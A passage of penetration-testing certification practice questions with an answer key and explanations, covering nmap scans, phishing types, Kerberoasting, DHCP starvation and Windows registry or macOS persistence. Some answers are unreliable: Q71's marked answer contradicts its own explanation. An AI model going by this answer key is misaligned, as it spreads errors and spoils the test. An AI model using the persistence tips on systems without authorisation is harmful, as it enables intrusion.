After flooding the DHCP server with DHCPDISCOVER packets, the attacker needs to set up a rogue DHCP server to answer legitimate DHCP requests as they come in. Yersinia is an application that can help carry out a DHCP starvation attack. In a DHCP starvation attack, the attacker sends a large volume of phony, spoofed DHCP requests. The server responds to those requests, thinking they are legitimate, and eventually runs out of IP addresses to assign from its pool. The attacker then sets up their own rogue DHCP server to respond to legitimate requests from other machines on the network, which now fall back to the rogue DHCP server. The attacker can then hand out addresses that route victims to a default gateway of the attacker’s choosing, effectively establishing a man-in-the-middle attack.

DHCP snooping is a defense against rogue DHCP servers because it helps determine if DHCP traffic is legitimate or not. Using trusted switch ports, it can establish a trusted flow, and if any DHCP server traffic originates or goes outside of that expected trusted flow, it can reject that traffic as illegitimate.

DHCPDISCOVER and DHCPOFFER are both packet types used in the client/server process to assign an IP address. The DISCOVER packet originates from the client, looking for a DHCP server to assign them an IP address. DHCPOFFER is the response from the server to the client’s request, and sends an IP address that the client can use. There would be no need to send more DHCPDISCOVER packets once the DHCP server runs out of addresses in the pool. DHCPOFFER packets would not adversely impact the DHCP server as they are sent to DHCP clients.

54
Q

Using nmap, you have determined that ports 20 and 21 are open on a server and that traffic using these ports is traversing the network.

What tool would be the best to use to leverage this vulnerability?

A.evil twin
B.honeypot
C.sniffer
D.rainbow table

A

C.sniffer

Explanation:
As ports 20 and 21 are used by FTP and FTP is a clear text protocol, a sniffer could be used to capture both the FTP data and the authentication credentials. All of this is transmitted in clear text.

An evil twin would not be the best approach. An evil twin is a wireless access point that uses the same SSID as your legitimate AP but on a different channel. By jamming the channel of the legitimate AP, all devices associated with that AP will be disconnected and will then do what they are designed to do, which is to reconnect to any AP hosting that SSID. When they associate with the evil twin, they will then be on the hacker’s network and will be exposed to peer-to-peer attacks. None of this will be an avenue to leveraging the FTP weakness, however, as in our case we can just sniff the existing traffic running through the access points.

A honeypot would not be the correct approach. A honeypot is a system that is configured to be attractive to hackers. Its purpose is twofold. First, it distracts from other devices, and second, it engages the attacker and allows us to collect information about them. None of this will be an avenue to leveraging the FTP weakness, as we are the ones going in there to sniff in the first place.

Using a rainbow table would not be the correct approach. Rainbow tables are precomputed lists of password hashes or encryption keys, hashed in advance to speed up the process of cracking a hash or an encryption key. Because FTP is clear text, there is no need to crack passwords or keys. They can be captured in clear text with a sniffer. Work smarter, not harder!

55
Q

Your company has several Apple computers with OS X installed. When OS X boots up, launchd is run to finish system startup. This executable loads parameters for the system level from the property list (plist) found in /System/Library/.

Which of these options, if modified properly, will allow you to launch executables for persistence at every reboot?

A.Daemon
B.systemd
C.etc
D.Launch Daemon

A

D.Launch Daemon

Explanation:
If modified properly, the Launch Daemon will allow you to launch executables for persistence at every reboot. These may be created with administrator privileges, but the weakness, or vulnerability, here is that they do not need admin privileges to run on startup, which gives an attacker a reliable way to have an executable, backdoor or trojan run immediately after a reboot.

Daemon is another name for a background process that is running.

The /etc folder is the directory that holds the system-related configuration files for your computer.

It is not systemd. systemd does not exist in the Mac universe; it is used on Linux/Unix systems.

56
Q

One of the procedures you carried out during a pen test was to send several text messages to users requesting that they use a link in the text to log in to their email account and change their signature to use a new logo. If they follow proper security policy, they will ignore these kinds of texts.

What type of attack did you simulate?

A.whaling
B.vishing
C.elicitation
D.smishing

A

D.smishing

Explanation:
The attack is an SMS phishing or smishing attack. This is one of several forms of a phishing attack. A smishing attack leverages the SMS service which is used for text messages.

The attack that occurred is not a whaling attack, one of several versions of a phishing attack. In a whaling attack, the phishing email is targeted to a “big fish” or a senior officer of the company. All phishing attacks use counterfeit communications to entice a user into using a provided link to log in to a network, website, or database. The link is also counterfeit, but the resulting login page is completely convincing to the victim. When they log in, their credentials are stolen or harvested.

This is also not an elicitation attack. In short, elicitation is the act of gaining knowledge or information from a user or company without directly asking for it.

This is not a vishing attack. A vishing attack is a phishing attack that is performed using the telephone or by voice over IP (VOIP).

57
Q

When performing a compliance-based assessment, what item, when present, should drive the creation of objectives?

A.the results of a pre-assessment
B.regulatory requirements
C.company policies
D.prior assessment results

A

B.regulatory requirements

Explanation:
The requirements of any regulations, such as HIPAA or PCI-DSS, should be the main driver of objectives. Compliance with these requirements is the whole purpose of a compliance-based assessment.

In cases where there are no regulatory requirements to be met, then the company’s policies might be the driver, but when there are such requirements, the regulatory requirements should drive the objectives.

While prior assessment results should be reviewed for repeat issues, when regulatory requirements are present they should drive the objectives.

Pre-assessments are rare, but even when used, they will not drive the creation of objectives when regulatory requirements are present.

58
Q

During a recent penetration test, you discovered that passwords for an internal application were stored in plaintext. You must ensure that passwords cannot be read. You need to recommend the BEST remediation for this issue only.

What should you recommend?

A.Encrypt all passwords and implement multi-factor authentication.
B.Hash all passwords and then encrypt the password file.
C.Increase password complexity and implement multi-factor authentication.
D.Hash all passwords and increase password complexity.

A

B.Hash all passwords and then encrypt the password file.

Explanation:
The best remediation for passwords stored in plaintext is to hash all passwords and then encrypt the password file. This will ensure that it is much harder to discover the passwords.

You would not recommend hashing all passwords and increasing password complexity. Password complexity will not prevent the passwords from being stored in plaintext.

You would not recommend encrypting all passwords and implementing multi-factor authentication. Multi-factor authentication would not provide any protection against plaintext passwords.

You would not recommend increasing password complexity and implementing multi-factor authentication. Neither of these remediations addresses the issue of storing passwords in plaintext.

59
Q

One of the key executives in the company received an email that appeared to come from the IT security officer requesting that he log into the network using a provided link and confirm his contact information. He did so, and shortly thereafter sensitive documents on his computer were stolen.

What type of attack occurred?

A.whaling
B.vishing
C.elicitation
D.phishing

A

A.whaling

Explanation:
The attack that occurred is a whaling attack, one of several versions of a phishing attack. In a whaling attack, the phishing email is targeted to a “big fish” or a senior officer of the company. All phishing attacks use counterfeit communications to entice a user into using a provided link to log into a network, website, or database. The link is also counterfeit, but the resulting login page is completely convincing to the victim. When they log in, their credentials are stolen or harvested.

The attack is not just a plain phishing attack. In a basic phishing attack, the phishing email is sent to thousands of potential victims and assumes that a certain percentage of the users will fall for the attack.

This is also not an elicitation attack. In short, elicitation is the act of gaining knowledge or information from a user or company without directly asking for it.

This is not a vishing attack. A vishing attack is a phishing attack that is performed using the telephone or by voice over IP (VOIP).

60
Q

As a penetration tester, you must perform a half-open port scan that does NOT require a full TCP connection. A portion of the command that you plan to run is as follows:

nmap _______ 192.168.33.24

Which parameter should you include in this command?

A.-sS
B.-sn
C.-sU
D.-sT

A

A.-sS

Explanation:
The -sS parameter is the Nmap SYN scan command. It is an active scan that sends a TCP SYN packet and does not require a full connection. Depending on the response (or lack thereof), you can use this parameter to determine the status of a port. The following exhibit shows this command:

The -sT parameter of the Nmap command performs a TCP connect scan. It establishes a full TCP connection with the target. It is the scan type Nmap falls back to when no scan type is specified and the user does not have permission to read/write raw packets, and it should only be used in that situation. The following exhibit shows this command:

The -sU parameter of the Nmap command performs a UDP scan. It is used to enumerate DNS, SNMP, or DHCP servers, all of which require UDP packets for communication. The following exhibit shows this command:

The -sn parameter of the Nmap command performs a ping scan. It sends an ICMP echo packet by default. If the target responds, then it is alive. If not, the target is considered offline. The following exhibit shows this command:

61
Q

Which of the following social engineering attacks requires physical access to a facility?

A.whaling
B.spear phishing
C.impersonation
D.USB key drop

A

D.USB key drop

Explanation:
USB key drop occurs when someone leaves a USB stick with malware on it in open view somewhere in the hope that a curious user might insert it and unknowingly infect the computer. This can be addressed through training, but the most effective approach is to disable all USB ports. It requires physical access to drop the USB key. One of the most famous of these incidents is the Stuxnet virus entering a nuclear facility in Iran via multiple USB drops.

Spear phishing is a form of phishing that is targeted to a single individual rather than to thousands of users. It is done through email and requires no physical access to the facility.

A whaling attack is another of several versions of a phishing attack. In a whaling attack, the phishing email is targeted to a “big fish” or a senior officer of the company. All phishing attacks use counterfeit communications to entice a user into using a provided link to log in to a network, website, or database. The link is also counterfeit but the resulting login page is completely convincing to the victim and when they log in their credentials are stolen or harvested. It is done through email and requires no physical access to the facility.

Impersonation is the process of pretending to be someone else for the purpose of obtaining information. While it can be done in person, in which case physical access would be required, it is most often done over the phone or through text or email, which does not require physical access.

62
Q

During the first stage of a penetration test, you discover multiple critical issues with Internet-facing servers. As a result, the penetration test sponsor has asked you to focus on those servers instead of testing all of the organization’s servers.

Of what is this an example?

A.De-confliction
B.Communication path restructure
C.Goal reprioritization
D.De-escalation

A

C.Goal reprioritization

Explanation:
This is an example of goal reprioritization. As a result of the sponsor’s request, you would need to implement the change management process to obtain approval of a change to the engagement plan. The change may or may not be approved.

De-escalation occurs when the criticality of one of the findings is reduced. This may happen due to research and analysis that determines the finding is not considered as critical as was once believed.

De-confliction occurs when a conflict between findings or goals is found. Often organizations will need to negotiate with stakeholders when these conflicts exist.

A communication path restructure would occur if a stakeholder needs to be added, removed, or replaced in the communication path.

63
Q

You want to perform a scan on a network in the least aggressive way possible. Which Nmap command would you run?

A.nmap -sV -T0 -F 192.168.1.1-20
B.nmap -sS -T3 -F 192.168.1.1-20
C.nmap -p80 -T5 192.168.1.1-20
D.nmap -sS -p443 -T1 192.168.1.1-20

A

A.nmap -sV -T0 -F 192.168.1.1-20

Explanation:
The nmap -sV -T0 -F 192.168.1.1-20 command would be the least aggressive way to scan this network. Timing templates are specified with the -T command and range from the numbers 0-5. -T0 takes by far the longest time to scan a network and is extremely unlikely to set off any IDS alerts due to the slow speed of packets. The following graphic is an example of this command:

  • -T0 and -T1 are unlikely to set off IDS alerts, though they take an extremely long time to finish a scan, especially if there are thousands of machines or ports.
  • -T2 is about ten times slower than a -T3 scan and also carries the same low risk of crashing hosts as -T3. -T3 is the default timing template for scans.
  • -T4 and -T5 are the fastest timing templates. However, -T5 requires a very high-speed network. This parameter also presents the highest risk for setting off IDS alerts and for crashing hosts.
64
Q

You need to perform a vulnerability scan for all servers in the Research Department’s subnet. The servers all use IP addresses in the 10.1.1.2 through 10.1.1.10 range. These servers contain highly confidential data.

You need to identify the correct scanning parameters for the servers. Match each configuration on the left with the appropriate scanning setting on the right.

Sensitivity level: Assessment scan

Scope: 10.1.1.2 - 10.1.1.10

Authentication: Credentialed

A

The parameters for the vulnerability scan should be:

Sensitivity level - Assessment scan
Scope - 10.1.1.2 through 10.1.1.10
Authentication - Credentialed

The sensitivity level is the type of scan (discovery scan or assessment scan). The scope is the range of computers you want to scan. The authentication method in this case should be credentialed because the servers contain confidential data.

A discovery scan simply provides an inventory of discovered hosts. An assessment scan will actually assess all the hosts based on the criteria given (such as IP address).

A credentialed scan will use login credentials of a privileged account to access data that is protected by access control lists (ACLs). A non-credentialed scan would be unable to scan certain areas on the hosts.

65
Q

While finalizing a penetration testing report for a customer, you realize that you used several acronyms and technical terms that the audience may not understand. You need to provide explanations for these acronyms and terms. Where should you provide this information?

A.Main body
B.Appendices
C.Technical summary
D.Executive summary

A

B.Appendices

Explanation:
Explanations of acronyms and technical terms should be provided in the appendices. This ensures that you only have to provide an explanation of the acronyms and terms in a single location. It also ensures that the reader can easily locate the explanations of those acronyms and terms. If you provided those explanations within the text, you might need to explain them multiple times, at each mention of the acronym or term.

The executive summary, main body, and technical summary should not include the explanations of the acronyms and terms.

The executive summary should contain the summary of the penetration test scope and major findings.
The technical summary should contain the technical details on the findings of the penetration test. The IT department and technical staff will use the technical summary to help them make decisions on which actions should be taken for mitigation.
The main body of the report usually includes the statement of scope, methodologies and tools used, and the details of the findings.
66
Q

Which of the following items would NOT be included in the rules of engagement for an external penetration test?

A.client contact information
B.network diagram
C.scope of testing
D.sensitive data handling

A

B.network diagram

Explanation:
In an external test, you are attempting to determine what an attacker with NO information can achieve, so a network diagram would not be provided.

Even if a network diagram is provided, as in the case of an internal test, it still would not be part of the rules of engagement. More importantly, it is these rules that identify which parts of the client’s systems are fair game or out of bounds. Specifically, the rules of engagement should include the following:

Scope of testing (which machines, which networks, and what type of testing)
Sensitive data handling
Client contact information
Client IT notifications (Are they aware of the test?)
Meeting schedules and procedures
Best practices for cleaning up after the tests are concluded
67
Q

When getting ready to do a vulnerability scan on a network, you need to understand fragile systems and non-traditional items on the network that may be negatively affected when being heavily pinged.

Which of the following items are the most fragile when scanned or attacked? (Choose two.)

A.Cell phones
B.Fax machines
C.Macs
D.IoT
E.Printers
A

D.IoT
E.Printers

Explanation:
Internet of Things (IoT) devices and printers are the most fragile when scanned or attacked. During active scanning on your network, the scan is knocking on all of the ports’ doors, which is fine for most devices. Unfortunately, that knocking can cause damage to the more fragile IoT items that aren’t built to take that kind of traffic. For example, when a port scan is initiated against a printer, a large amount of “garbage” may be printed, including seemingly meaningless information output from each port as it is scanned. If you are using something like Nessus or another GUI scanner in the same vein, you may get a message similar to the following:

“The remote host appears to be a network printer, multi-function device, or other fragile device. Such devices often react very poorly when scanned.”

IoT devices are usually clumped into a number of devices and aren’t meant to be slammed with scanning techniques.

Cell phones are not considered fragile devices and can be scanned on a Wi-Fi network without the user knowing about it.

Fax machines are not usually connected to the network, but to the phone line. There are ways to attack fax machines, but that is outside the scope of this practice test remediation.

Computers that run macOS are like any other computer. They can be pinged or DoS’d like any other computer without affecting their operation.

68
Q

A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?

A.Clickjacking
B.Full path disclosure
C.Expired certificate
D.Stored XSS

A

D.Stored XSS

Explanation:
Stored XSS attacks occur when the malicious code is permanently stored on a vulnerable server, using a database. These attacks are typically carried out on websites (web applications).

Full path disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot or file (e.g. /home/omg/htdocs/file/). Certain techniques, such as using load_file() within a SQL injection to view the page source, require the attacker to know the full path to the file they wish to view.

Clickjacking, also known as a UI redress attack, is when an attacker uses multiple transparent or opaque layers to trick a user into clicking a button or link on another page when they intended to click the top-level page. Thus, the attacker is “hijacking” clicks meant for the visible page and routing them to another page, most likely owned by another application, domain, or both.

An expired certificate would alert people going to your website that your website is no longer “secure.” It is not to be prioritized as critical, but definitely in need of correction.

69
Q

Your goal is to crack a password that is encrypted in the ciphertext format. Which of the following would you use if you wished to crack the password offline?

A.Medusa
B.Hydra
C.John the Ripper
D.Mimikatz

A

C.John the Ripper

Explanation:
John the Ripper is an extremely popular tool which is used for password cracking. It works offline and uses both search patterns and wordlists to crack passwords. There are many different ciphertext formats the tool understands.

Hydra is an active tool which interacts with the targeted server. It goes down a list of username/password combinations, in an attempt to brute-force its way in. It is best to know information beforehand, such as a username.

Mimikatz retrieves hashed passwords from memory. It is used by both penetration testers, and even malware.

Medusa is a credential brute-forcing tool. It is similar to Hydra.

70
Q

As you look over your project scope and start to scan the networks, which of the following statements BEST describes a vulnerability in a network that you should watch for?

A.Input that is not tested prior to being processed and let through to the databases
B.A design or implementation flaw that can be exploited
C.A person or group responsible for a security incident
D.Any outside threat to the network

A

B.A design or implementation flaw that can be exploited

Explanation:
A design or implementation flaw that can be exploited best describes a vulnerability. A vulnerability is a defect or weakness in a particular system, module, or component that leaves it open to being compromised. Vulnerabilities can be compromised by threat actors (such as attackers), disasters (such as unplanned power outages), or accidents (such as human error).

Any outside threat to a network describes a security threat, not a vulnerability. A threat is a possibility of an event (such as an attack or a disaster) that takes advantage of a vulnerability and produces undesirable consequences, such as loss or damage of an asset or the inability to continue providing service to your customers.

Input that is not tested prior to being processed and failing to check security measures are examples of specific vulnerabilities. However, neither is a complete definition of a vulnerability.

A threat actor is a person or group who is responsible for a security incident. They are the ones who see a flaw in a network device, in other words a vulnerability, and want to exploit it.

71
Q

On a penetration test of your client’s site, you see a shopping catalog. Upon looking at the pictures of the items in their catalog, you find the address of where the images are located in the web application: /var/coats/images/218.png.

You put that address in your browser’s URL as https://insecure-website.com/var/coats/images/218.png. The image of a coat shows up by itself. You take that image and play with the address to easily allow a certain type of attack to happen. There is no security against this attack in place. What is this attack called?

A.Cookie manipulation
B.Directory traversal
C.Malicious file upload
D.File inclusion

A

D.File inclusion

Explanation:
This attack is a directory traversal. Directory traversal is a very common attack against sites. It is a really easy way to get around login information or access private galleries, files, or even username and email lists. Frequently this attack requires guessing which subdirectory and/or filename is your target. With some detective work, you can follow the normal file and domain structures that are out there. You can do this attack by using two different methods: the dot-dot-slash (../) method or by typing in the absolute path (https://interconn.com/wp-content/uploads/2018/03).

This is not cookie manipulation. Cookies are small pieces of data created and stored in a user’s browser that keep track of important information regarding the user’s session for a particular site. Cookie manipulation, also called cookie poisoning, is when a hacker is able to change data within that cookie to take over that user’s information or bypass security measures on websites. This is not the case here, as the pen tester was able to see another attack vector and move around the site.

This is not a file inclusion attack. File inclusions themselves are normal and useful parts of a server-side scripting language. They exist to help with maintenance, updates, and code editing, and to allow web applications to pull and read files from the server’s file system.

Local file inclusion (LFI) and remote file inclusion (RFI) are similar to the nefarious cross site scripting (XSS) attacks. All of them are forms of code injection, with LFI being less sophisticated and therefore easily preventable. RFI is a method which allows an attacker to employ a script to include a remotely hosted file on the web server. LFI is very similar to RFI, the only difference being that to carry out the LFI attack, the attacker has to use local files on the current server, and RFI uses remote files. This scenario did not deal with the files on a server but with just changing parts of the web address to move around to areas that an external user wouldn’t normally be able to access.

This is not a malicious file upload attack. If a file upload option exists on a web application without any limiters or certain red flags it watches out for, then an attacker can upload malware right to the server and have a field day.

72
Q

Which physical security issue can be mitigated with privacy filters?

A.shoulder surfing
B.tailgating
C.piggybacking
D.lock bypass

A

A.shoulder surfing

Explanation:
Privacy filters fit over a device’s screen and allow for clear viewing of screen content ONLY when the authorized user is directly in front of the screen. This impedes shoulder surfing, which is the viewing of screen content from behind a user without the user’s knowledge.

Privacy filters cannot mitigate piggybacking. Piggybacking is a social engineering attack that involves entering a facility you are not authorized to enter by following an authorized person who opens the door using the credentials stored on their key card. It is mitigated by turnstiles or mantrap entries.

Privacy filters cannot mitigate tailgating. Often you will see the terms piggybacking and tailgating used synonymously. However, there is a subtle difference between the two. Piggybacking implies that the person who opened the door with their credentials knows the individual following them in through the secure door. Tailgating means that the individual following through the door is unknown to the person with credentials.

Privacy filters cannot mitigate lock bypass. Lock bypass is a technique where the lock mechanism is never engaged or attacked; rather, it is bypassed, for example where one inserts a sprung steel device to retract the spring-loaded catch that restrains the shackle, preventing it from operating. The use of deadbolts in doors helps avoid lock bypass. The locking mechanism and bolt are operated by the key. This prevents the device from being opened without the locking mechanism itself being properly operated.

73
Q

Given a command: nmap -v -sV -O -sS -T2 192.168.1.1, what is the primary function of the -O switch?

A.OS fingerprinting
B.Ping scan
C.Port selection
D.Service identification

A

A.OS fingerprinting

Explanation:
The Nmap -O option is used for OS detection/fingerprinting. This is used to determine which operating system the target is using.

The -p option of the Nmap command performs port selection. This is used to specify a port in a scan. The following exhibit shows an example of this command:

The -sV parameter of the Nmap command performs service identification. This gives information on services running, including mail or DNS server services. This could help determine the exploits to which a server could be vulnerable.

The -sn parameter of the Nmap command performs a ping scan. It sends an ICMP echo packet by default. If the target responds, then it is alive. If not, the target is considered offline. The following exhibit shows this command:

74
Q

You were hired to conduct a penetration test by an organization that employs biometrics as part of their security system. Prior to conducting the test, you were notified that there was a high level of false positives. What part of the biometric system would you focus on first?

A.Biometric algorithm
B.Biometric clipping levels
C.Biometric technology
D.Physical access

A

A.Biometric algorithm

Explanation:
A high volume of false positives (also known as Type II errors) would indicate an issue with the underlying configuration or mathematical algorithm of the biometric system. It could also mean that the biometric system has been tampered with. The algorithm is tasked with matching the exact, unique features of the user with the backend characteristics stored in the biometric system and also protecting that information. So, a tester would want to start with the algorithm to see if the biometric data can be intercepted and tampered with as it is traveling from the sensor back to the system for verification.

Biometric technology refers to testing the security vulnerabilities in the software application. The main goal is to discover any doorways that may have been left behind intentionally or unintentionally.

Physical access refers to actually testing the systems. A penetration tester can conduct a penetration test in a single sign on environment to determine the effectiveness of a fingerprint recognition system or an iris recognition system.

Clipping levels refer to a threshold that establishes expected user activity. Within the context of biometrics, a clipping level refers to the threshold for unsuccessful authentication attempts. An individual logging into an account should be locked out once the clipping level is met or exceeded, helping prevent against brute force attacks. While the tester would want to evaluate clipping levels, it would not be the first step in this situation.

75
Q

Which of the following items determines whether an organization must comply with PCI-DSS rules?

A.PINs/PIN blocks
B.PAN
C.CVV
D.Cardholder name
E.Expiration date
A

B.PAN

Explanation:
The treatment of the primary account number (PAN) is the determining factor in whether the Payment Card Industry Data Security Standard (PCI-DSS) applies to an organization. If the PAN is stored, processed, or transmitted, PCI-DSS applies. The PAN must always be stored in an encrypted, unreadable format.

The Payment Card Industry Data Security Standard (PCI-DSS) provides information security standards for organizations that hold financial transaction information, especially credit card data.

The other account data elements are all sensitive and, if stored or transmitted, must also be kept in an unreadable (encrypted) format. These items are:

PAN
Cardholder name
Expiration date
Service code

Sensitive authentication data is considered to be the PINs/PIN blocks, the Card Verification Value (CVV), and the data encoded in the card’s magnetic stripe or chip. The CVV is also referred to as the CAV2, the CID, the CVC2, and the CVV2.

76
Q

Your network has recently been victim to a number of SQL injection attacks. Management has asked you to implement appropriate remediation to protect against future attacks of this kind. Which one of the following techniques is NOT an appropriate remediation activity in this scenario?

A.Network firewall
B.Input sanitization
C.Input validation
D.Parameterized queries

A

A.Network firewall

Explanation:
Of the options given, network firewalls generally would not prevent a SQL injection attack.

Input sanitization, input validation, and parameterized queries are all acceptable means for preventing SQL injection attacks.

Input validation checks if the input meets a set of criteria.

Input sanitization takes it a step further. Data sanitization will actually modify the input to ensure it is valid.

Proper secure coding combines these two strategies for defense in depth. For example, you might change all single quotation marks in a string to double quotation marks (sanitize) and then check that all the quotation marks were actually changed to double quotation marks (validate) when the input is reentered into the input field.

Parameterized queries (also known as prepared statements) are typically used to avoid SQL injection attacks. Parameterized queries do proper substitution of arguments prior to running the SQL query. It completely removes the possibility of “dirty” input changing the meaning of your query. That is, if the input contains SQL, it can’t become part of what is executed because the SQL is never injected into the resulting statement.

77
Q

As a pen tester, you want to tinker with the Windows registry to set up persistent access to a Windows machine. Once this persistent access is enabled, you plan to execute batch files, executables, and even exported functions in DLLs. You currently have limited privileges and need to maintain persistence. Which of the following registry keys should you edit to keep your access on this machine? (Choose two.)

A.HKEY_CLASSES_ROOT
B.HKEY_CURRENT_CONFIG
C.HKEY_CURRENT_USER
D.HKEY_LOCAL_MACHINE

A

C.HKEY_CURRENT_USER
D.HKEY_LOCAL_MACHINE

Explanation:
Current user and local machine are the registry keys you want to play with, and insert code into, to maintain persistence.

While registry key editing is outside the scope of this exam, there is a program for changing ownership of registry keys. Here is an overview of how you can change registry keys. Registry Editor, which most computers have installed by default, allows you to pull up some of the keys, but you can run into some permission issues, even when you are logged in as an admin. (You can sometimes overcome that restriction by right-clicking on the key and changing permissions.) Instead, you should go to https://www.thewindowsclub.com/regownit-take-full-control-windows-registry-keys to download RegOwnit. Using this program, go to the same location and click on the key. The program will allow you to take ownership of the key, after which you can change the registry.

In terms of changing the registry key, it could be as easy as demonstrated in the exhibit, in which we are just adding in a call to a hidden executable code: C:\Our\Mostest\Evil\Binary.exe.

Part of hiding this, after using the above permissions work-around if needed, is using SVCHOST.exe with a “genuine service name” and a service DLL to run the edited registry entry. This makes it hard to tell that you are still hiding in the system.

HKEY_CURRENT_USER, often called HKCU, is part of a major group of registry keys called a registry hive. It is also a major part of the Windows operating system configuration. This key holds all of your user configuration information for your profile, including wallpaper, installed printers, display settings, networked drives, and other environment variables we take for granted when we log in.

HKEY_LOCAL_MACHINE (or HKLM) contains the majority of the configuration information for the software you have installed, as well as for the Windows operating system itself. In addition to software configuration data, the HKEY_LOCAL_MACHINE hive also contains lots of valuable information about currently detected hardware and device drivers.

HKEY_CLASSES_ROOT, often shortened to HKCR, is basically a lookup that kicks in when you ask your computer to do something. It then pulls the necessary DLLs from its group and performs the action. This will not really help with persistence.

HKEY_CURRENT_CONFIG, sometimes shortened to HKCC, does not store any information itself but instead acts as a pointer, or a shortcut, to a registry key that keeps information about the hardware profile currently being used.

78
Q

Which of the following factors, when present, does NOT enhance an interrogator’s ability to extract information from a user?

A.affiliation
B.criticism
C.intimidation
D.urgency

A

B.criticism

Explanation:
Criticism typically does not enhance an interrogator’s ability to extract information from a user. On the contrary, flattery and compliments tend to work in getting a user to open up.

Intimidation does work well. When someone fears an unpleasant outcome if they do not cooperate, it causes many of them to do so.

Creating a sense of urgency to a situation also can help to move a user to act when they would not otherwise.

Creating a sense of affiliation with the user also helps. One is usually more open with someone who shares their interests.

79
Q

While performing a penetration test, you discover that attackers have been trying to hack into the company’s e-commerce server for several weeks. None of the attacks have been successful.

What should you do?

A.Only include the finding in the final report.
B.Only report the issue to the appropriate personnel.
C.Immediately report the issue to the appropriate personnel, and include the finding in the final report.
D.Do nothing. This issue is not a valid finding because vulnerabilities with the server were not discovered.

A

C.Immediately report the issue to the appropriate personnel, and include the finding in the final report.

Explanation:
You should immediately report the issue to the appropriate personnel and include the finding in the final report. This will ensure that the organization is aware of the threat against the e-commerce server.

You should not only include the finding in the final report. Although this is not an indicator of compromise (because the attacks have not been successful) or a critical finding, it is still important that you immediately contact the appropriate personnel. While the attack may not have been successful, it is likely that the attackers will continue until they are able to break into the system. Situational awareness is important when conducting penetration testing and this is a perfect example of situational awareness.

You should not only report the issue to the appropriate personnel. This incident should also be included in the final report.

You should not do nothing. This is a valid finding. Although the attack has not been successful yet, it is likely that eventually the attack will be successful. By notifying the appropriate personnel and including the finding in the final report, you ensure that the organization is aware of the threat.

80
Q

During the penetration testing planning session, the organization has decided to use CVSS scores to help determine the criticality of any discovered vulnerabilities. Which one of these CVSS groups does NOT receive a score in the CVSS system?

A.Base
B.Security
C.Environmental
D.Temporal

A

B.Security

Explanation:
An overall Common Vulnerability Scoring System (CVSS) score is generated using three group scores:

Base group: represents characteristics of a vulnerability that are constant over time and do not depend on the environment.
Temporal group: assesses a vulnerability as it changes over time.
Environmental group: represents the characteristics of a vulnerability, taking into account the organizational environment.

There is no Security group in the CVSS system.

81
Q

During a pen test, you extract service account credentials from Active Directory as a user without sending any packets to the target system, thereby bypassing any suspicion. Which type of attack is this?

A.VPN pivoting
B.PsExec
C.Golden ticket
D.Kerberoasting

A

D.Kerberoasting

Explanation:
This is a Kerberoasting attack. Kerberos authentication is a rabbit hole in and of itself. Kerberos has three components:

The client
The server
The Key Distribution Center (KDC)

The KDC is usually a trusted third party, so you get the ticket-granting ability, or Ticket Granting Ticket (TGT), from the KDC. To do so, you present authoritative documentation saying you can gain access to the resource server.

The Kerberoasting attack is performed by requesting a Kerberos service ticket for the Service Principal Name (SPN) of our target. The domain controller looks up that SPN and then encrypts the ticket for that SPN to allow us access to that SPN. The encryption type is RC4_HMAC_MD5, which means the service account’s NTLM password hash is used for the encryption. When you crack that encryption, you then have full access. Plus, you can ask for as many tickets as you want and just keep cracking encryption.

This is not a golden ticket attack. Yes, golden tickets can grant administrative access to Active Directory (AD) domains through Kerberos authentication. A golden ticket could be the next level in attacking that server, due to it being a step beyond our Kerberoasting attack. It is more the process of maintaining access to the compromised server that has been providing tickets. If an attacker retrieves the hash from the AD data store, the attacker can create a golden ticket and compromise any number of domain members, even domain controllers.

This scenario does not describe virtual private network (VPN) pivoting. In VPN pivoting, an attacker runs a VPN client on a compromised host and relays all internal traffic to the VPN server running on the attacker’s remote machine.

This scenario does not describe PsExec. PsExec is a simple and more robust alternative to Telnet and SSH that is used to manage remote Windows systems. Once a user’s credentials are compromised, an attacker can simply use this single executable on a target system to authenticate with the compromised credentials to other systems, or to run a malicious file and gain administrative access.

82
Q

Which risk management process involves doing nothing to prevent a specific risk from occurring?

A.Transference
B.Avoidance
C.Reduction
D.Sharing
E.Acceptance
A

E.Acceptance

Explanation:
Risk acceptance or risk tolerance is the act of choosing to leave a risk as it is, without implementing any countermeasures. A risk may be accepted when any damage caused by the risk would be easily absorbed, or when the available countermeasures for the risk are too cost-prohibitive to use.

Risk avoidance is a risk mitigation technique. By altering or stopping the business activity that generates the risk, the organization hopes to prevent the risk from occurring. It is not always practical to stop or change a business activity if the organization hopes to achieve its business goals. More commonly, organizations will choose to accept or to mitigate the risk.

Risk reduction involves using countermeasures to lessen the impact or probability of a risk. Risk reduction can use offensive or defensive controls. Offensive controls are proactive attempts to remove threats, such as applying a security patch or hardening servers. Defensive controls are attempts to respond to threats, such as installing an intrusion detection system (IDS).

Risk transference moves the responsibility for the risk to another entity, such as an insurance agency.

Risk sharing spreads the impact of the risk to another entity, such as hiring an outside firm with their own liability insurance to provide cybersecurity for your organization. However, organizations governed by such laws as GLBA, PCI-DSS, and HIPAA / HITECH cannot transfer away the risk of non-compliance. In other words, a company that must comply with HIPAA can contract an outside firm to ensure they are in compliance, but non-compliance will always be the fault of the parent company and not the contractor.

84
Q

Your company uses scheduling to automatically run tasks with different permission sets or to trigger a task using events or at specific time intervals. However, you are concerned that an attacker can schedule a backdoor script to run and open a way into a victim’s Windows computer. You want to search the Task Scheduler on Windows computers to see if a backdoor is being run.

Which command would allow you to check if the backdoor is scheduled to run?
A.mstask
B.LaunchD Task Scheduler
C.schtasks
D.crontab -e
A

C.schtasks

Explanation:
The schtasks.exe command allows a user to create, delete, and search scheduled tasks on a remote or local computer. Just typing in schtasks will show you the current status and next run time for all scheduled events, as seen below:

It is not LaunchD Task Scheduler. This program creates the job for launchd, which is an Apple user daemon, to schedule. We are using the Windows operating system for this scenario.

It is not crontab -e. The cron function in Linux acts like the task scheduler function in the Windows operating system. We are using the Windows operating system for this scenario, not Linux.

It is not mstask.exe, unless you are on an older machine (Win95 through WinMe). The versions of Windows which use this command are no longer supported and should not exist in any enterprise.

85
Q

What kind of scan is this?

'nmap -sT -A -v 192.168.1.0/24'

A.Stealth Scan
B.Compliance Scan
C.Discovery Scan
D.Full Scan

A

D.Full Scan

Explanation:
You performed a full scan with the addition of the -A switch. This option enables OS detection, version detection, script scanning, and traceroute.

